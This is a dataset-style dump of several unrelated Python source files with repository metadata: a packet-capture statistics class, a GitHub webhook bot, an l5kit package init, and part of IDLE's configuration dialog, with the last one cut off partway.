async def event_dispatch(self, event_name: Optional[str] = None, *args: tuple[Any], **kwargs: Dict[Any, Any]):
pass
| 30.461538 | 114 | 0.686869 |
4a2582f160a80b3740fa3a3c0dd02621d7bb623a | 21,609 | py | Python | src/PacketCapture.py | sanaakhelloqi/pcapstats | a4135948ec345c46cc20b21c2b1a870df8cafa7e | [
"Apache-2.0"
] | null | null | null | src/PacketCapture.py | sanaakhelloqi/pcapstats | a4135948ec345c46cc20b21c2b1a870df8cafa7e | [
"Apache-2.0"
] | null | null | null | src/PacketCapture.py | sanaakhelloqi/pcapstats | a4135948ec345c46cc20b21c2b1a870df8cafa7e | [
"Apache-2.0"
] | null | null | null | import libs.mlvideos as mlvideos
from src.datamodel.Packet import Packets
from typing import List, Union
from decimal import Decimal
from pathlib import Path
import math
import collections
import pandas as pd
import numpy as np
from scipy import stats
import networkx as nx
class PacketCapture:
def __init__(self, file: Path, packets: Packets):
self.file = file
self.packets = packets.get_packets()
self.stats = {"Deltas": {},
"Lengths": {},
"Arrival times": {}}
self.features = {}
self.graph_representation = None
self.deltas = None
self.times = self.get_times()
self.lengths = self.get_lengths()
self.total_length = self.get_total_length()
self.packets_count = self.get_packets_count()
self.list_of_tuple_src_dst = self.get_list_of_tuple_src_dst()
self.set_of_all_ip_addr = self.get_set_of_all_ip_addr()
def get_list_of_tuple_src_dst(self):
return [(pkt.srcIp, pkt.dstIp) for pkt in self.packets]
def get_times(self) -> List[Decimal]:
"""returns a list of arrival time of packets
"""
return [pkt.time for pkt in self.packets]
def get_lengths(self) -> List[int]:
"""returns a list of length of packets
"""
return [pkt.length for pkt in self.packets]
def get_total_length(self):
"""returns the total length of packets in kbit
"""
total_length = 0
for pkt in self.packets:
total_length += pkt.length
return self.byte_to_kbit(Decimal(total_length))
def get_packets_count(self):
"""returns the packets count
"""
return len(self.get_times())
def calc_deltas(self, start=Decimal(0), end=Decimal(0)):
mlvideos.normalize_times_from_times(self.times)
end = self.times[-1] if end == Decimal(0) else end
times_ = [i for i in self.times if start <= i <= end]
self.deltas = list([float(delta) for delta in mlvideos.get_deltas_from_times(times_)])
def get_deltas(self) -> List[float]:
if not self.deltas:
self.calc_deltas()
return self.deltas
def get_deltas_count(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["count"] = float(pd.Series(self.deltas).count())
def get_deltas_mean(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["mean"] = float(pd.Series(self.deltas).mean())
def get_deltas_std(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["std"] = float(pd.Series(self.deltas).std())
def get_deltas_min(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["min"] = float(pd.Series(self.deltas).min())
def get_deltas_max(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["max"] = float(pd.Series(self.deltas).max())
def get_deltas_variance(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["variance"] = float(np.var(self.deltas))
def get_deltas_variance_coefficient(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["variance_coefficient"] = float(np.std(self.deltas) / np.mean(self.deltas))
def get_deltas_mode(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["mode"] = float(stats.mode(self.deltas)[0])
def get_deltas_kurtosis(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["kurtosis"] = float(stats.mstats.kurtosis(self.deltas))
def get_deltas_skewness(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["skewness"] = float(stats.skew(self.deltas))
def get_deltas_median(self):
if not self.deltas:
self.calc_deltas()
else:
self.stats["Deltas"]["median"] = float(np.median(self.deltas))
def get_lengths_count(self):
self.stats["Lengths"]["count"] = float(pd.Series(self.lengths).count())
def get_lengths_mean(self):
self.stats["Lengths"]["mean"] = float(pd.Series(self.lengths).mean())
def get_lengths_std(self):
self.stats["Lengths"]["std"] = float(pd.Series(self.lengths).std())
def get_lengths_min(self):
self.stats["Lengths"]["min"] = float(pd.Series(self.lengths).min())
def get_lengths_max(self):
self.stats["Lengths"]["max"] = float(pd.Series(self.lengths).max())
def get_lengths_variance(self):
self.stats["Lengths"]["variance"] = float(np.var(self.lengths))
def get_lengths_variance_coefficient(self):
self.stats["Lengths"]["variance_coefficient"] = float(np.std(self.lengths) / np.mean(self.lengths))
def get_lengths_mode(self):
self.stats["Lengths"]["mode"] = float(stats.mode(self.lengths)[0])
def get_lengths_kurtosis(self):
self.stats["Lengths"]["kurtosis"] = float(stats.mstats.kurtosis(self.lengths))
def get_lengths_skewness(self):
self.stats["Lengths"]["skewness"] = float(stats.skew(self.lengths))
def get_lengths_median(self):
self.stats["Lengths"]["median"] = float(np.median(self.lengths))
def get_times_min(self):
mlvideos.normalize_times_from_times(self.times)
self.stats["Arrival times"]["min"] = float(pd.Series(self.times).min())
def get_times_max(self):
mlvideos.normalize_times_from_times(self.times)
self.stats["Arrival times"]["max"] = float(pd.Series(self.times).max())
def get_times_median(self):
mlvideos.normalize_times_from_times(self.times)
self.stats["Arrival times"]["median"] = float(np.median(self.times))
def collect_stats(self):
# deltas
self.get_deltas_count()
self.get_deltas_mean()
self.get_deltas_std()
self.get_deltas_min()
self.get_deltas_max()
self.get_deltas_variance()
self.get_deltas_variance_coefficient()
self.get_deltas_mode()
self.get_deltas_kurtosis()
self.get_deltas_skewness()
self.get_deltas_median()
# lengths
self.get_lengths_count()
self.get_lengths_mean()
self.get_lengths_std()
self.get_lengths_min()
self.get_lengths_max()
self.get_lengths_variance()
self.get_lengths_variance_coefficient()
self.get_lengths_mode()
self.get_lengths_kurtosis()
self.get_lengths_skewness()
self.get_lengths_median()
# arrival times
self.get_times_min()
self.get_times_max()
self.get_times_median()
def get_stats(self):
self.collect_stats()
return self.stats
def remove_partner_ips(self, list_of_all_ip_addr):
"""To get a list just of host ips
"""
for ip in list_of_all_ip_addr:
for _tuple in self.list_of_tuple_src_dst:
if ip != _tuple[0] and ip != _tuple[1]:
list_of_all_ip_addr.remove(ip)
break
def get_host_ip(self, list_of_all_ip_addr):
count_0 = 0
count_1 = 0
for _tuple in self.list_of_tuple_src_dst:
if _tuple[1] == list_of_all_ip_addr[0]:
count_0 += 1
elif _tuple[1] == list_of_all_ip_addr[1]:
count_1 += 1
if count_0 > count_1:
host_ip = list_of_all_ip_addr[0]
else:
host_ip = list_of_all_ip_addr[1]
return host_ip
def get_list_of_host_ip(self):
"""removes partner ip addresses from the list of all ip addr --> returns the list of host ip
"""
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
else:
list_of_all_ip_addr.clear()
list_of_all_ip_addr.append(self.get_host_ip(list(self.set_of_all_ip_addr)))
return list_of_all_ip_addr
def get_set_of_all_ip_addr(self):
"""returns a list of all ip addrs
"""
set_of_all_ip_addr = set()
for _tuple in self.list_of_tuple_src_dst:
set_of_all_ip_addr.add(_tuple[0])
set_of_all_ip_addr.add(_tuple[1])
return sorted(list(set_of_all_ip_addr))
def get_list_of_partners(self):
"""returns a list of ip partners
"""
set_of_partner = set()
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
for _tuple in self.list_of_tuple_src_dst:
if _tuple[0] not in list_of_all_ip_addr:
set_of_partner.add(_tuple[0])
if _tuple[1] not in list_of_all_ip_addr:
set_of_partner.add(_tuple[1])
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for _tuple in self.list_of_tuple_src_dst:
if _tuple[0] != host_ip:
set_of_partner.add(_tuple[0])
if _tuple[1] != host_ip:
set_of_partner.add(_tuple[1])
return list(set_of_partner)
def get_partner_number(self):
return len(self.get_list_of_partners())
def get_communication_number_with_host(self):
"""returns how much connections with the host
"""
counter = 0
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
host_list = list_of_all_ip_addr
for host in host_list:
for _tuple in self.list_of_tuple_src_dst:
if _tuple[0] == host or _tuple[1] == host:
counter += 1
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for _tuple in self.list_of_tuple_src_dst:
if _tuple[0] == host_ip or _tuple[1] == host_ip:
counter += 1
return counter
def get_communication_weight(self, partner_ip, percentage=False):
"""returns percent of the communication between host and the partner_ip --> how much connections with the
partner_ip through the whole connections
"""
communication_host_partnerip_counter = 0
for _tuple in self.list_of_tuple_src_dst:
if (_tuple[0] == partner_ip or _tuple[1] == partner_ip) and (
_tuple[0] in self.get_list_of_host_ip() or _tuple[1] in self.get_list_of_host_ip()):
communication_host_partnerip_counter += 1
if percentage:
return communication_host_partnerip_counter / self.get_communication_number_with_host()
return communication_host_partnerip_counter
def get_list_partner_communication_percent(self):
"""returns a list of tuples --> ip of the partner, how much percent communication with the host
"""
list_of_partners = self.get_list_of_partners()
list_of_tuple_ip_communication_percent = []
for partner in list_of_partners:
list_of_tuple_ip_communication_percent.append((partner, self.get_communication_weight(partner)))
return list_of_tuple_ip_communication_percent
def get_ip_graph(self, directed=True):
if not self.graph_representation:
self.graph_representation = self.build_ip_graph(directed)
return self.graph_representation
def build_ip_graph(self, directed=True):
communication = [(pkt.srcIp, pkt.dstIp) for pkt in self.packets]
counter = collections.Counter(list(communication))
g = nx.DiGraph()
for edge in counter.most_common():
g.add_edge(edge[0][0], edge[0][1], weight=edge[1])
return g
def get_packets_count_by_second(self):
"""returns dictionary: Keys = seconds and values= packets count
"""
mlvideos.normalize_times_from_times(self.times)
times_ = []
for time in self.times:
times_.append(math.floor(time))
dict_ = dict(collections.Counter(times_))
t_dict = {second: 0 for second in range(0, times_[-1] + 1)}
for key, value in dict_.items():
t_dict[key] += value
return t_dict
def get_download_rate_by_second(self):
download_length = 0
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.dstIp in src_list:
download_length += pkt.length
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.dstIp == host_ip:
download_length += pkt.length
download_length_kbit = self.byte_to_kbit(Decimal(download_length))
mlvideos.normalize_times_from_times(self.times)
return Decimal((download_length_kbit / self.times[-1]))
def get_total_length_downloaded(self):
download_length = 0
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.dstIp in src_list:
download_length += pkt.length
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.dstIp == host_ip:
download_length += pkt.length
return self.byte_to_kbit(Decimal(download_length))
def get_time_dr_dict(self):
list_times = []
list_lengths = []
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.dstIp in src_list:
list_times.append(pkt.time)
list_lengths.append(self.byte_to_kbit(pkt.length))
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.dstIp == host_ip:
list_times.append(pkt.time)
list_lengths.append(self.byte_to_kbit(pkt.length))
mlvideos.normalize_times_from_times(list_times)
list_times2 = [(math.ceil(list_times[i])) for i in range(0, len(list_times))]
merged_list = [(list_times2[i], list_lengths[i]) for i in range(0, len(list_lengths))]
time_dict = {}
for packet in merged_list:
if time_dict.get(packet[0]) is None:
time_dict[packet[0]] = packet[1]
else:
time_dict[packet[0]] += packet[1]
mlvideos.normalize_times_from_times(self.times)
max_second = math.ceil(self.times[-1])
time_dr_dict = {second: 0 for second in range(0, max_second + 1)}
for key, value in time_dict.items():
time_dr_dict[key] += value
return time_dr_dict
def get_delta_list(self, alpha, bitrate):
buffer = 0
dl = True
play = False
delta_t_list = []
delta_t2_list = []
second_counter = 0
time_dr_dict = self.get_time_dr_dict()
for time, download_rate in time_dr_dict.items():
second_counter += 1 # 1 loop == 1 second
buffer += download_rate / bitrate
if dl and not play and buffer >= alpha:
buffer = max(buffer - 1, 0)
play = True
dl = True
delta_t_list.append(second_counter + (alpha * bitrate / download_rate))
second_counter = 0
# elif play == False and dl == True:
elif buffer == 0 and dl and play:
play = False
dl = True
delta_t2_list.append(second_counter + ((alpha * bitrate) / (bitrate - download_rate)))
second_counter = 0
elif play and dl:
buffer = max(buffer - 1, 0)
return delta_t_list
def get_total_stall_time(self, alpha, bitrate):
delta_t_list = self.get_delta_list(alpha, bitrate)
total_stall_time = 0
for time in delta_t_list[1:]:
total_stall_time += time
return total_stall_time
def get_total_stall_count(self, alpha, bitrate):
delta_t_list = self.get_delta_list(alpha, bitrate)
if delta_t_list:
count = len(delta_t_list) - 1
else:
count = 0
return count
def get_initial_delay(self, alpha, bitrate):
delta_t_list = self.get_delta_list(alpha, bitrate)
if delta_t_list:
initial_delay = delta_t_list[0]
else:
initial_delay = 0
return initial_delay
def get_upload_rate_by_second(self):
upload_length = 0
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.srcIp in src_list:
upload_length += pkt.length
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.srcIp == host_ip:
upload_length += pkt.length
upload_length_kbit = self.byte_to_kbit(Decimal(upload_length))
mlvideos.normalize_times_from_times(self.times)
return Decimal((upload_length_kbit / self.times[-1]))
def get_page_load_time_total(self):
return self.get_page_load_time(self.get_total_length_downloaded())
def get_page_load_time_half(self):
return self.get_page_load_time(Decimal(self.get_total_length_downloaded() / 2))
def get_page_load_time_three_quarters(self):
return self.get_page_load_time(Decimal(self.get_total_length_downloaded() * 3 / 4))
def get_page_load_time_quarter(self):
return self.get_page_load_time(Decimal(self.get_total_length_downloaded() / 4))
def get_page_load_time(self, pagesize):
download_length = 0
page_load_time = []
list_of_all_ip_addr = list(self.set_of_all_ip_addr).copy()
if len(list_of_all_ip_addr) > 2:
self.remove_partner_ips(list_of_all_ip_addr)
src_list = list_of_all_ip_addr
for pkt in self.packets:
if pkt.dstIp in src_list:
if download_length <= pagesize:
download_length += pkt.length
page_load_time.append(pkt.time)
else:
break
else:
host_ip = self.get_host_ip(list_of_all_ip_addr)
for pkt in self.packets:
if pkt.dstIp == host_ip:
if download_length <= pagesize:
download_length += pkt.length
page_load_time.append(pkt.time)
else:
break
mlvideos.normalize_times_from_times(page_load_time)
return page_load_time[-1]
def get_features(self) -> dict:
return self.features
def calc_features(self):
self.features = {"Number of packets": self.get_packets_count(),
"Download rate in kbit/s": float(
self.get_download_rate_by_second()),
"Upload rate in kbit/s": float(
self.get_upload_rate_by_second()),
"Length of all packets in kbit": float(
self.get_total_length()),
"Total downloaded length in kbit": float(
self.get_total_length_downloaded()),
"Total Stall time": float(
self.get_total_stall_time(30, 8000)),
"Total Stall number": float(
self.get_total_stall_count(30, 8000)),
"Initial delay": float(self.get_initial_delay(30, 8000)),
"Time needed in second for the total downloaded size":
float(self.get_page_load_time_total()),
"Time needed for the half of the downloaded size":
float(self.get_page_load_time_half()),
"Time needed for the quarter of the downloaded size": float(
self.get_page_load_time_quarter()),
"Time needed for the three quarters of the downloaded size": float(
self.get_page_load_time_three_quarters())
}
@staticmethod
def byte_to_kbit(_byte: Union[int, Decimal]) -> Decimal:
return _byte * 8 / 1000
| 37.646341 | 113 | 0.601138 |
4a25835f0ca4e0e4241eda45c82c17075b38ef8d | 1,242 | py | Python | pluto/__main__.py | barrachri/pluto | fa97bfb808af35effcf8c17258c7a390e76f5ea1 | [
"MIT"
] | null | null | null | pluto/__main__.py | barrachri/pluto | fa97bfb808af35effcf8c17258c7a390e76f5ea1 | [
"MIT"
] | null | null | null | pluto/__main__.py | barrachri/pluto | fa97bfb808af35effcf8c17258c7a390e76f5ea1 | [
"MIT"
] | null | null | null | import os
from aiohttp import web
import aiohttp
from gidgethub import routing, sansio
from gidgethub import aiohttp as gh_aiohttp
from . import pull_request
from . import comments
router = routing.Router(pull_request.router, comments.router)
async def test(request):
return web.Response(status=200, text="Hello world!")
async def main(request):
# read the GitHub webhook payload
body = await request.read()
# our authentication token and secret
oauth_token = os.environ.get("GH_TOKEN")
# a representation of GitHub webhook event
event = sansio.Event.from_http(request.headers, body)
# instead of mariatta, use your own username
async with aiohttp.ClientSession() as session:
gh = gh_aiohttp.GitHubAPI(session, "barrachri",
oauth_token=oauth_token)
# call the appropriate callback for the event
await router.dispatch(event, gh)
# return a "Success"
return web.Response(status=200)
if __name__ == "__main__":
app = web.Application()
app.router.add_get("/test", test)
app.router.add_post("/", main)
port = os.environ.get("PORT")
if port is not None:
port = int(port)
web.run_app(app, port=port)
| 25.346939 | 61 | 0.683575 |
4a2583daf248e83df871f7da84adf29d792207f6 | 1,023 | py | Python | l5kit/l5kit/data/__init__.py | cedricxie/l5kit | d21644e20f642c5160fee24028dc34d5abb4bf4e | [
"Apache-2.0"
] | null | null | null | l5kit/l5kit/data/__init__.py | cedricxie/l5kit | d21644e20f642c5160fee24028dc34d5abb4bf4e | [
"Apache-2.0"
] | null | null | null | l5kit/l5kit/data/__init__.py | cedricxie/l5kit | d21644e20f642c5160fee24028dc34d5abb4bf4e | [
"Apache-2.0"
] | null | null | null | from .combine import get_combined_scenes
from .filter import (
filter_agents_by_frames,
filter_agents_by_labels,
filter_tl_faces_by_frames,
filter_tl_faces_by_status,
get_agent_by_track_id,
)
from .labels import PERCEPTION_LABEL_TO_INDEX, PERCEPTION_LABELS, TL_FACE_LABEL_TO_INDEX, TL_FACE_LABELS
from .local_data_manager import DataManager, LocalDataManager
from .map_api import MapAPI
from .zarr_dataset import AGENT_DTYPE, FRAME_DTYPE, SCENE_DTYPE, TL_FACE_DTYPE, ChunkedDataset
from .zarr_utils import zarr_concat
__all__ = [
"get_combined_scenes",
"DataManager",
"LocalDataManager",
"ChunkedDataset",
"SCENE_DTYPE",
"FRAME_DTYPE",
"AGENT_DTYPE",
"TL_FACE_DTYPE",
"PERCEPTION_LABELS",
"PERCEPTION_LABEL_TO_INDEX",
"filter_agents_by_labels",
"get_agent_by_track_id",
"filter_agents_by_frames",
"filter_tl_faces_by_frames",
"MapAPI",
"zarr_concat",
"TL_FACE_LABEL_TO_INDEX",
"TL_FACE_LABELS",
"filter_tl_faces_by_status",
]
| 28.416667 | 104 | 0.761486 |
4a25846238f6e1a30ca9529d9a8a8030a24ee8aa | 68,616 | py | Python | Lib/idlelib/configdialog.py | madcoder2k17/cpython | 34b54873b51a1ebee2a3c57b7205537b4f33128d | [
"PSF-2.0"
] | null | null | null | Lib/idlelib/configdialog.py | madcoder2k17/cpython | 34b54873b51a1ebee2a3c57b7205537b4f33128d | [
"PSF-2.0"
] | null | null | null | Lib/idlelib/configdialog.py | madcoder2k17/cpython | 34b54873b51a1ebee2a3c57b7205537b4f33128d | [
"PSF-2.0"
] | null | null | null | """IDLE Configuration Dialog: support user customization of IDLE by GUI
Customize font faces, sizes, and colorization attributes. Set indentation
defaults. Customize keybindings. Colorization and keybindings can be
saved as user defined sets. Select startup options including shell/editor
and default window size. Define additional help sources.
Note that tab width in IDLE is currently fixed at eight due to Tk issues.
Refer to comments in EditorWindow autoindent code for details.
"""
from tkinter import (Toplevel, Frame, LabelFrame, Listbox, Label, Button,
Entry, Text, Scale, Radiobutton, Checkbutton, Canvas,
StringVar, BooleanVar, IntVar, TRUE, FALSE,
TOP, BOTTOM, RIGHT, LEFT, SOLID, GROOVE, NORMAL, DISABLED,
NONE, BOTH, X, Y, W, E, EW, NS, NSEW, NW,
HORIZONTAL, VERTICAL, ANCHOR, END)
from tkinter.ttk import Scrollbar
import tkinter.colorchooser as tkColorChooser
import tkinter.font as tkFont
import tkinter.messagebox as tkMessageBox
from idlelib.config import idleConf
from idlelib.config_key import GetKeysDialog
from idlelib.dynoption import DynOptionMenu
from idlelib import macosx
from idlelib.query import SectionName, HelpSource
from idlelib.tabbedpages import TabbedPageSet
from idlelib.textview import view_text
class ConfigDialog(Toplevel):
def __init__(self, parent, title='', _htest=False, _utest=False):
"""
_htest - bool, change box location when running htest
_utest - bool, don't wait_window when running unittest
"""
Toplevel.__init__(self, parent)
self.parent = parent
if _htest:
parent.instance_dict = {}
self.withdraw()
self.configure(borderwidth=5)
self.title(title or 'IDLE Preferences')
x = parent.winfo_rootx() + 20
y = parent.winfo_rooty() + (30 if not _htest else 150)
self.geometry(f'+{x}+{y}')
#Theme Elements. Each theme element key is its display name.
#The first value of the tuple is the sample area tag name.
#The second value is the display name list sort index.
self.theme_elements={
'Normal Text': ('normal', '00'),
'Python Keywords': ('keyword', '01'),
'Python Definitions': ('definition', '02'),
'Python Builtins': ('builtin', '03'),
'Python Comments': ('comment', '04'),
'Python Strings': ('string', '05'),
'Selected Text': ('hilite', '06'),
'Found Text': ('hit', '07'),
'Cursor': ('cursor', '08'),
'Editor Breakpoint': ('break', '09'),
'Shell Normal Text': ('console', '10'),
'Shell Error Text': ('error', '11'),
'Shell Stdout Text': ('stdout', '12'),
'Shell Stderr Text': ('stderr', '13'),
}
self.reset_changed_items() #load initial values in changed items dict
self.create_widgets()
self.resizable(height=FALSE, width=FALSE)
self.transient(parent)
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.tab_pages.focus_set()
#key bindings for this dialog
#self.bind('<Escape>', self.Cancel) #dismiss dialog, no save
#self.bind('<Alt-a>', self.Apply) #apply changes, save
#self.bind('<F1>', self.Help) #context help
self.load_configs()
self.attach_var_callbacks() #avoid callbacks during load_configs
if not _utest:
self.wm_deiconify()
self.wait_window()
def create_widgets(self):
self.tab_pages = TabbedPageSet(self,
page_names=['Fonts/Tabs', 'Highlighting', 'Keys', 'General',
'Extensions'])
self.tab_pages.pack(side=TOP, expand=TRUE, fill=BOTH)
self.create_page_font_tab()
self.create_page_highlight()
self.create_page_keys()
self.create_page_general()
self.create_page_extensions()
self.create_action_buttons().pack(side=BOTTOM)
def create_action_buttons(self):
if macosx.isAquaTk():
# Changing the default padding on OSX results in unreadable
# text in the buttons
padding_args = {}
else:
padding_args = {'padx':6, 'pady':3}
outer = Frame(self, pady=2)
buttons = Frame(outer, pady=2)
for txt, cmd in (
('Ok', self.ok),
('Apply', self.apply),
('Cancel', self.cancel),
('Help', self.help)):
Button(buttons, text=txt, command=cmd, takefocus=FALSE,
**padding_args).pack(side=LEFT, padx=5)
# add space above buttons
Frame(outer, height=2, borderwidth=0).pack(side=TOP)
buttons.pack(side=BOTTOM)
return outer
def create_page_font_tab(self):
parent = self.parent
self.font_size = StringVar(parent)
self.font_bold = BooleanVar(parent)
self.font_name = StringVar(parent)
self.space_num = IntVar(parent)
self.edit_font = tkFont.Font(parent, ('courier', 10, 'normal'))
##widget creation
#body frame
frame = self.tab_pages.pages['Fonts/Tabs'].frame
#body section frames
frame_font = LabelFrame(
frame, borderwidth=2, relief=GROOVE, text=' Base Editor Font ')
frame_indent = LabelFrame(
frame, borderwidth=2, relief=GROOVE, text=' Indentation Width ')
#frame_font
frame_font_name = Frame(frame_font)
frame_font_param = Frame(frame_font)
font_name_title = Label(
frame_font_name, justify=LEFT, text='Font Face :')
self.list_fonts = Listbox(
frame_font_name, height=5, takefocus=FALSE, exportselection=FALSE)
self.list_fonts.bind(
'<ButtonRelease-1>', self.on_list_fonts_button_release)
scroll_font = Scrollbar(frame_font_name)
scroll_font.config(command=self.list_fonts.yview)
self.list_fonts.config(yscrollcommand=scroll_font.set)
font_size_title = Label(frame_font_param, text='Size :')
self.opt_menu_font_size = DynOptionMenu(
frame_font_param, self.font_size, None, command=self.set_font_sample)
check_font_bold = Checkbutton(
frame_font_param, variable=self.font_bold, onvalue=1,
offvalue=0, text='Bold', command=self.set_font_sample)
frame_font_sample = Frame(frame_font, relief=SOLID, borderwidth=1)
self.font_sample = Label(
frame_font_sample, justify=LEFT, font=self.edit_font,
text='AaBbCcDdEe\nFfGgHhIiJjK\n1234567890\n#:+=(){}[]')
#frame_indent
frame_indent_size = Frame(frame_indent)
indent_size_title = Label(
frame_indent_size, justify=LEFT,
text='Python Standard: 4 Spaces!')
self.scale_indent_size = Scale(
frame_indent_size, variable=self.space_num,
orient='horizontal', tickinterval=2, from_=2, to=16)
#widget packing
#body
frame_font.pack(side=LEFT, padx=5, pady=5, expand=TRUE, fill=BOTH)
frame_indent.pack(side=LEFT, padx=5, pady=5, fill=Y)
#frame_font
frame_font_name.pack(side=TOP, padx=5, pady=5, fill=X)
frame_font_param.pack(side=TOP, padx=5, pady=5, fill=X)
font_name_title.pack(side=TOP, anchor=W)
self.list_fonts.pack(side=LEFT, expand=TRUE, fill=X)
scroll_font.pack(side=LEFT, fill=Y)
font_size_title.pack(side=LEFT, anchor=W)
self.opt_menu_font_size.pack(side=LEFT, anchor=W)
check_font_bold.pack(side=LEFT, anchor=W, padx=20)
frame_font_sample.pack(side=TOP, padx=5, pady=5, expand=TRUE, fill=BOTH)
self.font_sample.pack(expand=TRUE, fill=BOTH)
#frame_indent
frame_indent_size.pack(side=TOP, fill=X)
indent_size_title.pack(side=TOP, anchor=W, padx=5)
self.scale_indent_size.pack(side=TOP, padx=5, fill=X)
return frame
def create_page_highlight(self):
parent = self.parent
self.builtin_theme = StringVar(parent)
self.custom_theme = StringVar(parent)
self.fg_bg_toggle = BooleanVar(parent)
self.colour = StringVar(parent)
self.font_name = StringVar(parent)
self.is_builtin_theme = BooleanVar(parent)
self.highlight_target = StringVar(parent)
##widget creation
#body frame
frame = self.tab_pages.pages['Highlighting'].frame
#body section frames
frame_custom = LabelFrame(frame, borderwidth=2, relief=GROOVE,
text=' Custom Highlighting ')
frame_theme = LabelFrame(frame, borderwidth=2, relief=GROOVE,
text=' Highlighting Theme ')
#frame_custom
self.text_highlight_sample=Text(
frame_custom, relief=SOLID, borderwidth=1,
font=('courier', 12, ''), cursor='hand2', width=21, height=11,
takefocus=FALSE, highlightthickness=0, wrap=NONE)
text=self.text_highlight_sample
text.bind('<Double-Button-1>', lambda e: 'break')
text.bind('<B1-Motion>', lambda e: 'break')
text_and_tags=(
('#you can click here', 'comment'), ('\n', 'normal'),
('#to choose items', 'comment'), ('\n', 'normal'),
('def', 'keyword'), (' ', 'normal'),
('func', 'definition'), ('(param):\n ', 'normal'),
('"""string"""', 'string'), ('\n var0 = ', 'normal'),
("'string'", 'string'), ('\n var1 = ', 'normal'),
("'selected'", 'hilite'), ('\n var2 = ', 'normal'),
("'found'", 'hit'), ('\n var3 = ', 'normal'),
('list', 'builtin'), ('(', 'normal'),
('None', 'keyword'), (')\n', 'normal'),
(' breakpoint("line")', 'break'), ('\n\n', 'normal'),
(' error ', 'error'), (' ', 'normal'),
('cursor |', 'cursor'), ('\n ', 'normal'),
('shell', 'console'), (' ', 'normal'),
('stdout', 'stdout'), (' ', 'normal'),
('stderr', 'stderr'), ('\n', 'normal'))
for texttag in text_and_tags:
text.insert(END, texttag[0], texttag[1])
for element in self.theme_elements:
def tem(event, elem=element):
event.widget.winfo_toplevel().highlight_target.set(elem)
text.tag_bind(
self.theme_elements[element][0], '<ButtonPress-1>', tem)
text.config(state=DISABLED)
self.frame_colour_set = Frame(frame_custom, relief=SOLID, borderwidth=1)
frame_fg_bg_toggle = Frame(frame_custom)
button_set_colour = Button(
self.frame_colour_set, text='Choose Colour for :',
command=self.get_colour, highlightthickness=0)
self.opt_menu_highlight_target = DynOptionMenu(
self.frame_colour_set, self.highlight_target, None,
highlightthickness=0) #, command=self.set_highlight_targetBinding
self.radio_fg = Radiobutton(
frame_fg_bg_toggle, variable=self.fg_bg_toggle, value=1,
text='Foreground', command=self.set_colour_sample_binding)
self.radio_bg=Radiobutton(
frame_fg_bg_toggle, variable=self.fg_bg_toggle, value=0,
text='Background', command=self.set_colour_sample_binding)
self.fg_bg_toggle.set(1)
button_save_custom_theme = Button(
frame_custom, text='Save as New Custom Theme',
command=self.save_as_new_theme)
#frame_theme
theme_type_title = Label(frame_theme, text='Select : ')
self.radio_theme_builtin = Radiobutton(
frame_theme, variable=self.is_builtin_theme, value=1,
command=self.set_theme_type, text='a Built-in Theme')
self.radio_theme_custom = Radiobutton(
frame_theme, variable=self.is_builtin_theme, value=0,
command=self.set_theme_type, text='a Custom Theme')
self.opt_menu_theme_builtin = DynOptionMenu(
frame_theme, self.builtin_theme, None, command=None)
self.opt_menu_theme_custom=DynOptionMenu(
frame_theme, self.custom_theme, None, command=None)
self.button_delete_custom_theme=Button(
frame_theme, text='Delete Custom Theme',
command=self.delete_custom_theme)
self.new_custom_theme = Label(frame_theme, bd=2)
##widget packing
#body
frame_custom.pack(side=LEFT, padx=5, pady=5, expand=TRUE, fill=BOTH)
frame_theme.pack(side=LEFT, padx=5, pady=5, fill=Y)
#frame_custom
self.frame_colour_set.pack(side=TOP, padx=5, pady=5, expand=TRUE, fill=X)
frame_fg_bg_toggle.pack(side=TOP, padx=5, pady=0)
self.text_highlight_sample.pack(
side=TOP, padx=5, pady=5, expand=TRUE, fill=BOTH)
button_set_colour.pack(side=TOP, expand=TRUE, fill=X, padx=8, pady=4)
self.opt_menu_highlight_target.pack(
side=TOP, expand=TRUE, fill=X, padx=8, pady=3)
self.radio_fg.pack(side=LEFT, anchor=E)
self.radio_bg.pack(side=RIGHT, anchor=W)
button_save_custom_theme.pack(side=BOTTOM, fill=X, padx=5, pady=5)
#frame_theme
